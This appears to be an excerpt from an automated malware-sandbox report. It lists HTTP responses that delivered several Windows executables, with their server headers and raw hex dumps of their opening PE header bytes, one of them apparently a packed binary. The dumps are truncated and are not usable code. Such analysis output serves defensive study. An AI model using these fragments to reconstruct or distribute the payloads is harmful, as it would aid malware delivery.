46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 09:52:00 GMTContent-Type: application/octet-streamContent-Length: 3261440Last-Modified: Sat, 07 Dec 2024 09:40:24 GMTConnection: keep-aliveETag: "67541808-31c400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 00 3c 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b6 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 6e 64 6c 72 73 6e 78 00 10 2b 00 00 b0 06 00 00 08 2b 